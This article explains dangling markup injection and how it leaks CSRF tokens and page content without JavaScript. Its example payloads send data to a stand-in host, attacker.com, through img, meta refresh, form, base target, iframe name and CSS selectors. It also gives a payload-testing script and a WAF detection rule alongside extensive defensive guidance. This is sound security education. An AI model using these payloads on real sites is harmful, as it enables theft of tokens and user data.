Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

Understanding the Silent Data Exfiltration Technique That Bypasses Modern Web Security

In the ever-evolving landscape of web application security, attackers continuously discover innovative techniques to circumvent defensive measures. While Content Security Policy (CSP) and input filters have become increasingly effective at preventing traditional Cross-Site Scripting (XSS) attacks, a sophisticated exploitation method called Dangling Markup Injection offers attackers an alternative path to exfiltrate sensitive data without executing JavaScript code. This technique leverages fundamental browser behavior and HTML parsing mechanisms to capture confidential information, including CSRF tokens, session identifiers, and personal data.

What is Dangling Markup Injection?

Dangling markup injection is a technique for capturing data cross-domain in situations where a full cross-site scripting attack isn’t possible. Unlike conventional XSS attacks that require script execution, dangling markup exploits the way browsers parse incomplete HTML tags and attributes.

The attack exploits an unclosed tag or attribute to gain access to confidential data that is either contained in the code of the target web page or entered into forms on it. The fundamental principle relies on the browser’s lenient parsing behavior: when encountering an unclosed attribute or tag, browsers continue reading subsequent content until they find the appropriate closing delimiter.

The Core Mechanism

The attack works by injecting HTML that contains an opening tag with an incomplete attribute. When a browser parses the response, it will look ahead until it encounters a single quotation mark to terminate the attribute, and everything up until that character will be treated as being part of the URL and will be sent to the attacker’s server within the URL query string.

Consider a vulnerable web application that embeds user-controllable data into its HTML response without proper sanitization:

<input type="text" name="search" value="USER_INPUT_HERE">

If the application fails to escape characters like > or ", an attacker can inject a malicious payload that breaks out of the existing context and introduces a new HTML element with an unclosed attribute.

How Dangling Markup Injection Works

Basic Attack Vector

The most straightforward implementation of this technique involves injecting an image tag with an unclosed src attribute. Here’s how the attack unfolds:

Original vulnerable HTML:

<input type="text" name="email" value="USER_CONTROLLED_INPUT">
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Attacker’s payload:

"><img src='https://attacker.com/collect?data=

Resulting HTML after injection:

<input type="text" name="email" value=""><img src='https://attacker.com/collect?data=
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

The consequence of the attack is that the attacker can capture part of the application’s response following the injection point, which might contain sensitive data such as CSRF tokens, email messages, or financial data.

When the browser renders this page, it interprets everything between the injected src='https://attacker.com/collect?data= and the next single quote (in this case, after the CSRF token value) as part of the image URL. The browser then automatically makes a GET request to:

https://attacker.com/collect?data=<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Any non-alphanumeric characters, including newlines, will be URL-encoded, allowing the attacker to capture the complete content between the injection point and the closing delimiter.

Alternative Exploitation Techniques

While image tags are the most common vector, attackers can exploit various HTML elements that make external requests:

1. Meta Refresh Tags

"><meta http-equiv="refresh" content="0;url=https://attacker.com/exfil?

This payload redirects the page while capturing subsequent content in the URL parameters.

2. Form Action Manipulation

Attackers can inject incomplete form tags to redirect form submissions:

"><form action='https://attacker.com/capture?

Any form data submitted on the page will be sent to the attacker’s server along with the captured markup.

3. Base Tag Exploitation

Using the target attribute on the base tag, attackers can change the window name of every link on the page. By injecting an incomplete target attribute, the window name will be set with all the markup after the injection until the corresponding quote on every link on the page.

<a href="https://attacker.com/payload.html"><font size=100 color=red>Click here</font></a>
<base target='

When a user clicks any link on the page, the window.name property will contain all HTML content up to the next single quote, which can then be exfiltrated cross-domain since window.name is accessible across origins.

4. CSS-Based Exfiltration

CSS supports importing external CSS files using the @import rule, which can be abused along with CSS query selectors to exfiltrate arbitrary HTML content on the page.

<style>
input[name=csrf_token][value^=a]{
  background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf_token][value^=b]{
  background-image: url(https://attacker.com/exfil/b);
}
</style>

The regex-based query selector in CSS tries to find if there are any input tag with value started with the letter a and if such a tag exists, the arbitrary URL is loaded as the background image. This technique enables character-by-character extraction of sensitive tokens.

Why Dangling Markup is Particularly Dangerous

Bypasses Traditional XSS Defenses

Dangling markup works even with strict CSP in place, doesn’t require JavaScript execution, and can steal CSRF tokens, session identifiers, and other sensitive data.

Modern web applications typically implement multiple layers of defense:

Input validation and filtering - Blocks <script> tags and JavaScript event handlers
Content Security Policy (CSP) - Prevents execution of inline scripts and restricts resource loading
XSS Auditor / XSS Filter - Browser-based detection of malicious scripts
Output encoding - Escapes dangerous characters in user input

Dangling markup injection circumvents these protections because:

No JavaScript execution required - The attack relies purely on HTML structure and browser behavior
Legitimate HTML elements - Uses standard tags like <img>, <meta>, and <form> that applications often allow
Subtle syntax - The attack doesn’t introduce obviously malicious patterns that filters typically detect
Browser-native behavior - Exploits fundamental HTML parsing rules rather than security vulnerabilities

Real-World Impact Scenarios

CSRF Token Theft

The most critical application of dangling markup injection involves stealing CSRF tokens. Once an attacker obtains a valid CSRF token associated with a user’s session, they can:

Perform unauthorized state-changing operations
Modify user account settings
Initiate financial transactions
Change passwords or email addresses
Delete user data

Sensitive Information Leakage

Beyond CSRF tokens, attackers can exfiltrate:

Personal Identifiable Information (PII) - Names, addresses, phone numbers
Financial data - Credit card details, bank account information
Session identifiers - Enabling session hijacking attacks
Email content - Messages displayed on the page
Private messages - Chat conversations, notifications
API keys and secrets - Exposed in hidden form fields or JavaScript variables

Reconnaissance and Profiling

Even when immediate exploitation isn’t possible, captured data provides valuable intelligence:

Application structure and hidden functionality
Internal parameter names and formats
CSRF token generation patterns
User behavior and interaction patterns

Browser Behavior and Parsing Quirks

How Browsers Handle Unclosed Attributes

Modern browsers implement lenient HTML parsing based on the HTML5 specification. This permissive approach prioritizes user experience over strict syntax enforcement. When encountering an unclosed attribute:

The browser enters an attribute value context
It continues consuming characters until finding a matching quote
Subsequent opening quotes are treated as literal characters
The attribute remains open across multiple lines and nested elements
Only the matching closing quote or end-of-document terminates the attribute

This behavior, designed to handle malformed HTML gracefully, creates the exact vulnerability that dangling markup exploits.

URL Encoding and Data Transmission

Any non-alphanumeric characters, including newlines, will be URL-encoded during transmission. This means attackers receive the captured data in a structured format:

https://attacker.com/collect?data=%3Cinput%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%22token123%22%3E

Decoding this URL reveals the original HTML structure, allowing attackers to extract specific values programmatically.

Chrome’s Mitigation Attempts

The Chrome browser has decided to tackle dangling markup attacks by preventing tags like img from defining URLs containing raw characters such as angle brackets and newlines.

This browser-level mitigation blocks many basic dangling markup payloads but doesn’t eliminate the attack surface entirely. Attackers can:

Use alternative HTML elements not subject to URL restrictions
Exploit protocol schemes other than HTTP (e.g., FTP)
Employ DOM-based techniques that don’t rely on URL parameters
Leverage user interaction-based vectors

Bypassing Content Security Policy (CSP)

While CSP effectively prevents many XSS attacks, dangling markup injection presents unique challenges for CSP-based defenses.

CSP Limitations Against Dangling Markup

It’s quite common for a CSP to block resources like script. However, many CSPs do allow image requests, meaning you can often use img elements to make requests to external servers to disclose CSRF tokens.

A typical CSP might include:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

This policy blocks external scripts but doesn’t prevent image loading, leaving the application vulnerable to basic dangling markup attacks.

CSP Directives for Mitigation

Note that these policies will prevent some dangling markup exploits, because an easy way to capture data with no user interaction is using an img tag. However, it will not prevent other exploits, such as those that inject an anchor tag with a dangling href attribute.

More restrictive policies might include:

Content-Security-Policy: default-src 'none'; img-src 'self'; base-uri 'none'

However, even strict CSPs can be bypassed through:

DOM-Based Dangling Markup Techniques

Even from the most CSP restricted environments you can still exfiltrate data with some user interaction using the base target attribute.

Example exploitation with restrictive CSP:

<a href="http://attacker.com/payload.html">
  <font size=100 color=red>You must click me</font>
</a>
<base target='

The target attribute inside the base tag will contain HTML content until the next single quote, making the value of window.name if the link is clicked all that HTML content, which can then be accessed cross-domain.

Iframe Name Exploitation

Attackers can abuse iframe name attributes to bypass CSP restrictions:

<iframe src="vulnerable-page.php?input="><iframe name='" onload="exfiltrate(this.contentWindow)">
</iframe>

The inner iframe’s name attribute captures subsequent page content, which JavaScript in the outer iframe can access and transmit to attacker-controlled servers.

Advanced Exploitation Techniques

Automated Token Extraction

Sophisticated attackers deploy automated systems to extract specific values from captured markup. CSS regex selectors can be used to exfiltrate CSRF tokens character-by-character by injecting multiple selectors that trigger requests based on token prefix matches.

<style>
input[name=csrftoken][value^=a]{ background-image: url(https://attacker.com/exfil/a); }
input[name=csrftoken][value^=b]{ background-image: url(https://attacker.com/exfil/b); }
/* ... continued for all characters ... */
input[name=csrftoken][value^=a0]{ background-image: url(https://attacker.com/exfil/a0); }
input[name=csrftoken][value^=a1]{ background-image: url(https://attacker.com/exfil/a1); }
</style>

Based on which URLs receive requests, attackers reconstruct the complete token value. Tools like cssrf automate this entire process.

Multi-Stage Attacks

Dangling markup often serves as the initial phase in complex attack chains:

Reconnaissance - Extract page structure and identify sensitive fields
Token capture - Steal CSRF tokens using dangling markup
Session hijacking - Use captured session identifiers
Privilege escalation - Perform administrative actions with stolen credentials
Data exfiltration - Access sensitive information using elevated privileges

Persistent Attacks

By injecting payloads into stored data (comments, profiles, messages), attackers create persistent dangling markup attacks that affect every user viewing the compromised content. This transforms a single vulnerability into a wide-scale data harvesting operation.

Real-World Vulnerabilities and Case Studies

Social Media Platforms

Social media applications frequently allow limited HTML in user-generated content (comments, posts, bios). Insufficient sanitization has led to dangling markup vulnerabilities where attackers:

Captured authentication tokens from victim profiles
Exfiltrated private message previews
Harvested user session data
Built detailed user behavior profiles

E-commerce Websites

Online shopping platforms have been exploited through dangling markup in:

Product review sections
Customer support ticket systems
Wishlist and shopping cart features
Payment form validation messages

Captured data included credit card information, billing addresses, and order history.

Email Web Clients

Webmail services represent prime targets because:

Emails contain highly sensitive information
HTML rendering is necessary for formatted messages
Users expect rich content from legitimate senders
Multiple email accounts may be accessed from single sessions

Dangling markup in email content has enabled attackers to:

Steal inbox content
Capture email addresses and contact lists
Harvest authentication codes sent via email
Monitor correspondence in real-time

Comprehensive Prevention and Mitigation Strategies

Input Validation and Sanitization

You can prevent dangling markup attacks using the same general defenses for preventing cross-site scripting, by encoding data on output and validating input on arrival.

Strict Input Validation

Implement whitelisting-based validation that only allows explicitly permitted characters and patterns:

import re

def validate_user_input(input_string):
    # Only allow alphanumeric characters, spaces, and basic punctuation
    allowed_pattern = re.compile(r'^[a-zA-Z0-9\s.,!?-]+$')
    
    if not allowed_pattern.match(input_string):
        raise ValueError("Invalid characters detected")
    
    # Additional length restrictions
    if len(input_string) > 200:
        raise ValueError("Input too long")
    
    return input_string

Context-Aware Output Encoding

Apply appropriate encoding based on where data will be rendered:

import html

def safe_html_render(user_data):
    # HTML entity encoding for display in HTML context
    return html.escape(user_data, quote=True)

The quote=True parameter ensures both single and double quotes are escaped, preventing breakout from attribute contexts.

Content Security Policy Configuration

Prevention methods include strict HTML attribute encoding, CSP connect-src restrictions, and input validation that detects incomplete tags.

Restrictive CSP Headers

Implement a defense-in-depth CSP that limits multiple attack vectors:

Content-Security-Policy:
  default-src 'none';
  script-src 'self' 'nonce-{random}';
  style-src 'self';
  img-src 'self';
  font-src 'self';
  connect-src 'self';
  frame-src 'none';
  base-uri 'none';
  form-action 'self';
  frame-ancestors 'none';

Key directives for dangling markup prevention:

img-src 'self' - Prevents external image loading
base-uri 'none' - Blocks base tag injection
form-action 'self' - Restricts form submission destinations
connect-src 'self' - Limits AJAX and WebSocket connections

CSP Reporting

Enable CSP violation reporting to detect attempted attacks:

Content-Security-Policy: default-src 'self'; report-uri /csp-violation-report

Monitor and analyze reports to identify attack patterns and vulnerable endpoints.

Server-Side Protections

Response Header Security

Implement additional security headers:

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=(), camera=()

DOM Sanitization Libraries

Use battle-tested sanitization libraries that understand HTML parsing intricacies:

JavaScript (client-side):

import DOMPurify from 'dompurify';

function sanitizeHTML(dirty) {
    return DOMPurify.sanitize(dirty, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong'],
        ALLOWED_ATTR: [],
        KEEP_CONTENT: true
    });
}

Python (server-side):

from bleach import clean

def sanitize_html(user_input):
    allowed_tags = ['b', 'i', 'em', 'strong', 'p']
    allowed_attrs = {}
    
    return clean(
        user_input,
        tags=allowed_tags,
        attributes=allowed_attrs,
        strip=True
    )

Application Architecture Considerations

Separation of Contexts

Strictly separate different security contexts:

Never mix user-controlled data with sensitive information in the same HTML structure
Use separate pages or AJAX endpoints for operations involving CSRF tokens
Implement token delivery through HTTP headers rather than HTML body

Token Protection Strategies

CSRF tokens should be generated on the server-side and they should be generated only once per user session or each request. Per-request tokens are more secure than per-session tokens because the time range for an attacker to exploit stolen tokens is minimal.

Best practices for CSRF token management:

Server-side generation only - Never generate tokens in JavaScript
Strong randomness - Use cryptographically secure random number generators
Session binding - Tie tokens to specific user sessions
Short expiration - Implement time-based token invalidation
HTTP-only cookies - Prevent JavaScript access to session cookies
SameSite cookie attribute - Restrict cross-origin cookie transmission

Double-Submit Cookie Pattern

The most secure implementation of the Double Submit Cookie pattern is the Signed Double-Submit Cookie, which explicitly ties tokens to the user’s authenticated session. Always bind the CSRF token explicitly to session-specific data and use Hash-based Message Authentication (HMAC) with a server-side secret key.

Implementation example:

import hmac
import hashlib
import secrets

def generate_csrf_token(session_id, secret_key):
    # Generate random token
    random_token = secrets.token_urlsafe(32)
    
    # Create HMAC signature binding token to session
    signature = hmac.new(
        secret_key.encode(),
        f"{session_id}:{random_token}".encode(),
        hashlib.sha256
    ).hexdigest()
    
    # Combine token and signature
    return f"{random_token}.{signature}"

def validate_csrf_token(token, session_id, secret_key):
    try:
        random_token, signature = token.split('.')
        
        expected_signature = hmac.new(
            secret_key.encode(),
            f"{session_id}:{random_token}".encode(),
            hashlib.sha256
        ).hexdigest()
        
        return hmac.compare_digest(signature, expected_signature)
    except:
        return False

Detection and Monitoring

WAF Rules

Configure Web Application Firewall (WAF) rules to detect dangling markup patterns:

# ModSecurity rule example
SecRule REQUEST_BODY "@rx <(?:img|iframe|form|base|meta|link)[^>]*(?:src|href|action|target)\s*=\s*['\"][^'\"]*$" \
    "id:100001,\
    phase:2,\
    deny,\
    log,\
    msg:'Potential dangling markup injection detected'"

Anomaly Detection

Monitor application logs for suspicious patterns:

Unusually long URL parameters
Multiple requests with HTML entity encoding
Patterns matching unclosed HTML attributes
Requests originating from unexpected external domains

User Behavior Analytics

Track unusual activities that might indicate exploitation:

Multiple failed form submissions
Rapid sequential requests to different endpoints
Unexpected external resource loading attempts
Changes in user agent or referrer patterns

Testing for Dangling Markup Vulnerabilities

Manual Testing Methodology

Identify injection points - Test all user input fields, URL parameters, HTTP headers
Test character filtering - Verify which characters are blocked: < > " ' /
Inject basic payloads - Try simple incomplete tags: "><img src='http://attacker.com?
Examine source code - Review rendered HTML to confirm injection
Verify data exfiltration - Monitor attacker-controlled server for incoming requests
Test CSP effectiveness - Attempt bypasses using alternative elements

Automated Scanning

Use specialized tools and scripts:

import requests

def test_dangling_markup(url, parameter):
    payloads = [
        '"><img src="http://attacker.com?',
        "'><img src='http://attacker.com?",
        '"><iframe src="http://attacker.com?',
        '"><meta http-equiv="refresh" content="0;url=http://attacker.com?',
        '"><base target="',
    ]
    
    results = []
    for payload in payloads:
        test_data = {parameter: payload}
        response = requests.post(url, data=test_data)
        
        # Check if payload appears unencoded in response
        if payload in response.text:
            results.append({
                'payload': payload,
                'vulnerable': True,
                'context': extract_context(response.text, payload)
            })
    
    return results

Penetration Testing Checklist

[ ] Test all input fields for HTML injection
[ ] Verify quote character filtering
[ ] Check for angle bracket restrictions
[ ] Test attribute-based injections
[ ] Attempt CSP bypasses
[ ] Verify CSRF token exposure
[ ] Test stored vs reflected injection
[ ] Evaluate user interaction requirements
[ ] Check browser-specific behaviors
[ ] Test mobile application endpoints
[ ] Verify API endpoint security

Developer Security Guidelines

Secure Coding Practices

Assume all input is malicious - Treat user data as untrusted by default
Use framework protections - Leverage built-in security features of modern frameworks
Apply defense in depth - Implement multiple overlapping security layers
Regular security training - Keep development teams updated on emerging threats
Code review focus - Specifically review HTML rendering logic and user input handling

Framework-Specific Recommendations

React

// Automatic escaping by default
function SafeComponent({ userInput }) {
    return <div>{userInput}</div>;  // Safe - React escapes by default
}

// Dangerous - explicitly disabled escaping
function UnsafeComponent({ userInput }) {
    return <div dangerouslySetInnerHTML={{__html: userInput}} />;  // Vulnerable
}

Angular

// Use built-in sanitization
import { DomSanitizer } from '@angular/platform-browser';

constructor(private sanitizer: DomSanitizer) {}

getSafeHtml(userInput: string) {
    return this.sanitizer.sanitize(SecurityContext.HTML, userInput);
}

Django

# Template auto-escaping (enabled by default)
{{ user_input }}  # Safe - automatically escaped

# Explicitly disable escaping (dangerous)
{{ user_input|safe }}  # Vulnerable

Security Review Checklist

Before deploying code that handles user input:

[ ] All user input is validated against a whitelist
[ ] Output encoding is applied contextually
[ ] CSP headers are properly configured
[ ] CSRF tokens are securely implemented
[ ] No direct HTML concatenation with user data
[ ] Sanitization libraries are up to date
[ ] Security tests include dangling markup scenarios
[ ] Monitoring and logging are properly configured

Conclusion

Cross-Site Scripting (XSS) can defeat all CSRF mitigation techniques, making CSRF tokens essential for web applications that rely on cookies for authentication. However, dangling markup injection demonstrates that the attack surface extends beyond traditional XSS to include subtle HTML parsing behaviors.

This sophisticated technique highlights the importance of comprehensive security approaches that go beyond blocking obvious attack vectors. One can reduce the chances of getting hit by a dangling markup attack by checking web applications for vulnerability to code injection including HTML tags, checking and sanitizing user input data, introducing content security policies, and using browsers with protection against dangling markup.

Key Takeaways

Dangling markup doesn’t require JavaScript - Making it effective against strict CSP and XSS filters
Multiple exploitation vectors exist - Images, forms, base tags, meta redirects, and CSS all provide attack surfaces
Browser behavior enables attacks - Lenient HTML parsing creates the vulnerability
Defense requires multiple layers - No single mitigation completely eliminates the risk
CSRF tokens remain valuable - Despite potential exposure through dangling markup, they’re still essential
Continuous monitoring is crucial - Detection and response capabilities are as important as prevention

Future Considerations

As web applications evolve, new dangling markup vectors will likely emerge. Browser vendors continue implementing mitigations, but the fundamental HTML parsing behavior that enables these attacks remains necessary for backward compatibility. Security professionals must stay informed about emerging techniques and continually reassess application security postures.

The relationship between usability and security creates inherent tension - allowing rich HTML content improves user experience but expands attack surfaces. Organizations must carefully evaluate their risk tolerance and implement security controls proportional to the sensitivity of protected data.

By understanding dangling markup injection deeply, implementing comprehensive defenses, and maintaining vigilant monitoring, organizations can significantly reduce their exposure to this subtle but dangerous attack vector while preserving the functionality users expect from modern web applications.